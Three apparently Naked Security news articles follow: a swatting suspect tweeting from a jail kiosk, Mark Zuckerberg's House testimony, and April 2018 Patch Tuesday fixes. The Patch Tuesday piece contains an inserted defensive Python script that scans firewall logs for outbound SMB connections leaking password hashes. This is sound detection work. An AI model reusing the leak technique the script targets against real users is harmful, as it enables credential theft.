Barriss is facing a charge of involuntary manslaughter.

He allegedly made the call after a Call of Duty game in which two teammates were disputing a $1.50 wager. Apparently, one had accidentally “killed” a teammate in the first-person shooter game.

One of the players sent incorrect details of a nearby address to a known swatter, who was reportedly responsible for evacuations over a bomb hoax call at the Call of Duty World League Dallas Open in December.

After his arrest, Barriss said he felt “a little” remorse.

Of course, you know, I feel a little of remorse for what happened. I never intended for anyone to get shot and killed. I don’t think during any attempted swatting anyone’s intentions are for someone to get shot and killed. I guess they’re just going for that shock factor whatever it is, for whatever reason someone’s attempting swat, or whatever you want to call it.

Yes, I think we can definitely call what happened a SWAT. SWATting, which takes its name from elite law enforcement units called SWAT (Special Weapons and Tactics) teams, is the practice of making a false report to emergency services about shootings, bomb threats, hostage taking, or other alleged violent crime in the hopes that law enforcement will respond to a targeted address with deadly force.

In the recording of the emergency call that cost Finch his life, a man said he’d shot his father in the head. The caller also said he was holding his mother and a sibling at gunpoint in a closet. He said he’d poured gasoline all over the house and that he was thinking of lighting the house on fire.

Police surrounded Finch’s Wichita home, prepared to deal with a hostage situation. When Finch answered the door, he followed police instructions to put up his hands and move slowly. But at some point, authorities said, Finch appeared to be moving his hand toward his waistband as if he was going to pull out a gun.

A single shot killed Finch. He was dead by the time he reached the hospital. Police said the innocent man was unarmed.

Barriss might have expressed some kind of lukewarm remorse when he was arrested, but unless his Twitter account was hijacked at precisely the right time, it sounds like he has no qualms about referring to this potentially lethal hobby. The Twitter handle used to post the messages, @GoredTutor36, has previously been associated with Barriss.

So if he’s not an “eGod,” how did Barriss apparently get online?

A local paper, the Wichita Eagle, reports that there was a glitch during a software upgrade to an inmate kiosk that gave inmates internet access. Inmates use jail kiosks to check their account balances in order to buy items from the jail’s commissary and to send and receive messages. Beyond that, they’re not allowed to have access to the internet.

The Sedgwick County Sheriff’s Office on Monday said in a news release that the upgrade glitch gave inmates a chance to get onto the internet “for less than a few hours.”

Four tweets had gone out from Barriss’s account on Friday. One bragged about how much “swag” he had in jail.

The Sheriff’s Office said that the problem affected jail kiosks across the country, but it’s now fixed:

As soon as the path was identified it was closed and the affected kiosk was upgraded with the proper digital security features. [The kiosk that was upgraded improperly] has been tested and the issue did not reoccur.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/xv7S5xP5BdM/

Congress chews up Zuckerberg, day two: A far more thorough mastication

After Tuesday’s nearly five-hour grilling in the Senate – more of a light sautéing, really – Facebook CEO Mark Zuckerberg on Wednesday gave Congress another five hours of his life: this time, before the House Energy and Commerce Committee.

Representatives’ questions again hit on Tuesday’s themes: data privacy and the Cambridge Analytica (CA) data-scraping fiasco, election security, Facebook’s role in society, censorship of conservative voices, regulation, Facebook’s impenetrable privacy policy, racial discrimination in housing ads, and what the heck Facebook is: a media company (it pays for content creation)? A financial institution (think about people paying each other with Facebook’s Venmo)?

Zuck’s take on what Facebook has evolved into: “I consider Facebook a technology company. The main thing we do is write code. We do pay to help produce content. We also build planes to help connect people, but I don’t consider ourselves to be an aerospace company.” (Think of Facebook’s flying ISPs.)

When he hears people ask whether Facebook is a media company, the CEO said that what he really hears is whether the company has, or should have, responsibility over published content – be it fake news meant to sway elections, hate speech, or Russian bots doing bot badness.

His answer has evolved: for years, he’s been pushing back against fears about fake news on Facebook. The company just builds the tools and then steps back, he’s repeatedly said, insisting that the platform doesn’t bear any of the responsibilities of a publisher for verifying information.

Zuck still considers Facebook to be primarily a technology company, but over two days of testimony he’s acknowledged that it’s been slow to accept responsibility when people do bad things with its tools.

Overall, the tone of the questioning was a lot tougher than it was in the Senate. Zuckerberg didn’t budge from his script, though.

For example, Rep. Frank Pallone tried to nail Zuck down on making a commitment to changing all user default settings so as to minimize, “to the greatest extent possible,” the collection and use of data. One-word answer, please: yes or no?

Zuck demurred: “That’s a complex issue,” he said. “and it deserves more than a one-word answer.”

Pallone came back with a zinger having to do with how Facebook has passed the buck when it comes to protecting users’ data from being scraped and used to do things like target voters with political ads:

You said yesterday that each of us owns the data we put on Facebook. Every user is in control. But we know the problems with CA. How can Facebook users have control over their data when Facebook itself doesn’t?

OUCH! Yea, what he said!

Zuck’s I-Am-Teflon response: “We have the ability for people to sign into apps and bring their data with them.” That means you can have, for example, a calendar that shows friends’ birthdays, or a map that shows friends’ addresses. But to do that, you need access to your friends’ data as well as bringing in your own to an app. Facebook has now limited such app access so that people can only bring in their own data, he said.

OK… but that’s not really an answer. Of course, during his two days of testimony, Zuckerberg repeatedly explained that users have control over everything they post. There’s that little drop-down, Zuckerberg explained many, many times, that lets you choose who’s going to view your content – the public at large? Just friends? Groups? Just one or two people? It’s up to you!

True, privacy policies are tough to read, and that’s why Facebook tries to stick privacy into the stream of things. Like, say, those little drop-down arrows allowing you to choose who sees what… and did he mention those little drop-down arrows that let you choose the audience for a post? Maybe once or twice.

And yes, Zuck said, Facebook is working on making it easier for users to get to privacy settings. For example, after CA blew up last month, Facebook pledged to reach into the 20 or so dusty corners where it’s tucked away privacy and security settings and pull them into a centralized spot for users to more easily find and edit whatever data it’s got on them.

Assorted other bees in the House’s bonnet included:

Diamond and Silk. Diamond and Silk. Diamond and Silk.

What in the world is this “Diamond and Silk” that conservative lawmakers have repeatedly asked about during the two days of Zuck’s testimony? For those of us who aren’t familiar, it’s not a luxury brand: they’re two pro-Trump vloggers, Lynnette “Diamond” Hardaway and Rochelle “Silk” Richardson, who’ve claimed that Facebook has censored them on the grounds that they spread “unsafe” content.

On Wednesday, Rep. Joe Barton started his questioning by reading a request he got from a constituent: “Please ask Mr. Zuckerberg, why is Facebook censoring conservative voices?” He said he’d received “dozens” of similar queries through Facebook.

Zuckerberg: “Congressman, in that specific case, our team made an enforcement error and we have already gotten in touch with them to reverse it.”

Sen. Ted Cruz also brought up the vloggers during a heated exchange with Zuckerberg on Tuesday, citing them as an example of what he said is Facebook’s “pattern of bias and political censorship.”

Diamond and Silk were also brought up by Rep. Fred Upton and Rep. Marsha Blackburn, the latter of whom also asked if Facebook “subjectively manipulate[s] algorithms to prioritize or censor speech?”

When Zuck began his response by referencing hate speech and terrorist material – “the types of content we all agree we don’t want on the service” and which are automatically identified and banned from the platform – Blackburn angrily interrupted him, exclaiming:

Let me tell you something right now. Diamond and Silk is not terrorism!

What’s the difference between Facebook and J. Edgar Hoover?

Over the course of two days, both branches of Congress wondered whether Facebook is a surveillance outfit. Does it listen to our conversations? One seed of that worry was planted when many users, post-CA, requested their data archives from Facebook, only to find that the platform logs calls and texts – with permission, Facebook stressed – and which apparently went in many ears and right back out.

Rep. Bobby Rush asked Zuckerberg what the difference is between Facebook and a 1960s program wherein the government, through the FBI and local police, conducted a counterintelligence program to track and share information about civil rights activists, including their religious and political ideology. Rush himself was a “personal victim” of the program.

“Your organization is similar,” Rush said. “You’re truncating basic rights … including the right to privacy. What’s the difference between Facebook’s methodology and the methodology of American political pariah J. Edgar Hoover?”

Zuck said the difference between surveillance and what Facebook does is that on Facebook, you have control over your information. “You put it there. You can take it down anytime. I know of no surveillance organization that gives people that option.”

Mark, you’ve had a tough few days. I hate to make your week even more arduous.

But puh-LEEEZ. Come on. Everybody knows that Facebook tracks us across the web, even when we leave the platform. It’s been doing it for years.

One tool among many to do so is Facebook Pixel, a tiny, transparent image file the size of just one of the millions of pixels on a typical computer screen. No user would ever notice the microscopic snippet, but requests sent by web pages to get one are packed with information.

No, we don’t have that much control over our information. But Mark Zuckerberg has demonstrated masterful control when it comes to staying on message.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/c3sJIBGCPXk/

Update now! Microsoft April Patch Tuesday – 65 vulns, 24 critical

With the Windows 10 1803 Spring Creators Update delayed at the eleventh hour for unknown reasons, admins and end users still have plenty of work on their hands with April’s Patch Tuesday.

The big picture is 65 security fixes assigned CVE numbers, 23 of which (plus a separate Adobe Flash flaw) are rated critical, with no true zero-days among them.

An urgent 66th CVE on the list should already have been fixed a week ago through an emergency patch that Microsoft issued for a critical vulnerability (CVE-2018-0986) in the Microsoft Malware Protection Engine (MMPE).

Affecting Security Essentials, Intune Endpoint Protection, Windows Defender, Exchange Server 2013/2016, and Forefront Endpoint Protection 2010, this patch should have been applied automatically via MMPE itself.

A breakdown of the remaining 22 critical flaws shows:

  • Seven memory corruption vulnerabilities in the Chakra Scripting Engine (Edge’s JavaScript interpreter).
  • Five remote code execution (RCE) flaws in Microsoft Graphics’ Windows font library.
  • Four affecting Internet Explorer.
  • Four affecting the scripting engine also used by Internet Explorer.
  • One affecting Windows 10’s Edge browser.
  • One RCE in the Windows VBScript engine.

The five font-themed flaws attracted warnings from experts, including Dustin Childs of vulnerability research company Zero Day Initiative:

Since there are many ways to view fonts – web browsing, documents, attachments – it’s a broad attack surface and attractive to attackers.

A final interesting flaw is CVE-2018-0850, rated “Important” and affecting Microsoft Outlook.

Reported by US CERT/CC’s Will Dormann way back in November 2016, the flaw is addressed by this update, but not entirely, he said:

This update prevents automatic retrieval of remote OLE objects in Microsoft Outlook when rich text email messages are previewed. If a user clicks on an SMB link, however, this behavior will still cause a password hash to be leaked.
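As a defender-side illustration of the residual risk Dormann describes, here is an added example (not code from the article, Microsoft or CERT/CC) that scans constructed Windows Firewall-style log lines for outbound SMB sessions from a client to hosts outside an assumed internal address range, the trace a hash-leaking connection to an external SMB server would leave behind. The log layout, the internal ranges and every address in it are assumptions.

```python
import ipaddress

# Ports an SMB/CIFS client connects to; a Windows client following a
# \\host\share link opens one of these and may offer NTLM credentials.
SMB_PORTS = {445, 139}

# Assumed internal address space; SMB to any other destination is flagged.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample lines in the style of the Windows Firewall log
# (pfirewall.log): date time action proto src-ip dst-ip sport dport ... path
SAMPLE_LOG = """\
#Fields: date time action protocol src-ip dst-ip src-port dst-port size
2018-04-11 09:12:01 ALLOW TCP 10.0.0.5 10.0.0.20 49711 445 0 - 0 0 0 - - - SEND
2018-04-11 09:12:05 ALLOW TCP 10.0.0.5 203.0.113.7 49712 445 0 - 0 0 0 - - - SEND
2018-04-11 09:12:09 ALLOW TCP 10.0.0.5 198.51.100.9 49713 139 0 - 0 0 0 - - - SEND
2018-04-11 09:12:11 ALLOW TCP 10.0.0.5 203.0.113.50 49714 443 0 - 0 0 0 - - - SEND
2018-04-11 09:12:15 DROP TCP 10.0.0.5 203.0.113.7 49715 445 0 - 0 0 0 - - - SEND
2018-04-11 09:12:20 ALLOW TCP 203.0.113.9 10.0.0.5 51000 445 0 - 0 0 0 - - - RECEIVE
"""

def parse_line(line):
    """Parse one log line into a dict; None for header, blank or junk lines."""
    f = line.split()
    if not f or line.startswith("#") or len(f) < 9:
        return None
    try:
        return {"time": f"{f[0]} {f[1]}", "action": f[2], "proto": f[3],
                "src": f[4], "dst": ipaddress.ip_address(f[5]),
                "dport": int(f[7]), "path": f[-1]}
    except ValueError:  # non-numeric port or malformed address
        return None

def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)

def find_external_smb(log_text):
    """Outbound TCP sessions to SMB ports whose destination lies outside the
    internal ranges. DROP lines are kept: a blocked attempt still shows a
    client that followed such a link and deserves a look."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if (rec and rec["proto"] == "TCP" and rec["path"] == "SEND"
                and rec["dport"] in SMB_PORTS and not is_internal(rec["dst"])):
            hits.append(rec)
    return hits
```

Run against the sample, the internal file-server session and the HTTPS connection are ignored, while the three outbound attempts to external hosts on 445/139 are returned, including the one the firewall already dropped.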

Spectre chip flaws

In parallel news, AMD has issued a Windows microcode update addressing the Spectre variant 2 chip flaw (CVE-2017-5715) that Naked Security covered last week in relation to older Intel microprocessors.

For Windows 10 users, this works in tandem with a Microsoft update (look for “April 2018 Windows OS updates”), installed in conjunction with each PC manufacturer’s BIOS updates. Linux mitigations were released earlier in 2018, AMD said.

TL;DR: in the four words of Naked Security’s security update mantra: patch early, patch often.

Note. The Microsoft Knowledge Base (KB) update number you see depends on your Windows version and build number. The latest Windows 10 build is 16299.371 (1709), for which the update appears as KB4093112.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/BQlJiLPJPB8/